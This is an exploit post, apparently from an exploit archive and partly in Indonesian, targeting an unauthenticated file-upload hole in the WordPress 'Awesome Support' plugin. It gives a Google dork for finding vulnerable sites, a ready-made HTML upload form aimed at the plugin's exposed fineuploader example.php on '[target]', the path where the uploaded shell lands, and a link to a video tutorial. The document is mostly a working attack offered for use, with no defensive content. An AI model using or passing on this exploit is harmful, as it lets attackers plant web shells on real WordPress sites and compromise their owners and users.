# Author: DaOne (TGT)
# Vendor Homepage: http://codecanyon.net/item/wp-awesome-support-responsive-ticket-system/4619686
# Price: $21
# Category: webapps/php
# Google dork: inurl:wp-content/plugins/awesome-support
Exploit :
<html>
<body>
<form action="http://[target]/wp-content/plugins/awesome-support/plugins/jquery.fineuploader-3.5.0/server/php/example.php" method="post"
enctype="multipart/form-data">
Filename:<input type="file" name="qqfile" id="file"><br>
<input type="submit" name="submit" value="Submit">
</form>
</body>
</html>
Vuln Check : /wp-content/plugins/awesome-support/plugins/jquery.fineuploader-3.5.0/server/php/example.php
Shell Path
http://[target]/wp-content/plugins/awesome-support/plugins/jquery.fineuploader-3.5.0/server/php/uploads/
Video Tutorial By CoupDeGrace
Download Source Code HTML
Here
Copy Code tersebut dan simpan dengan nama file.html ( Format HTML )
Tutorial Video Download Here
Disini
Youtube :
http://www.youtube.com/watch?v=yxxkLAHHilU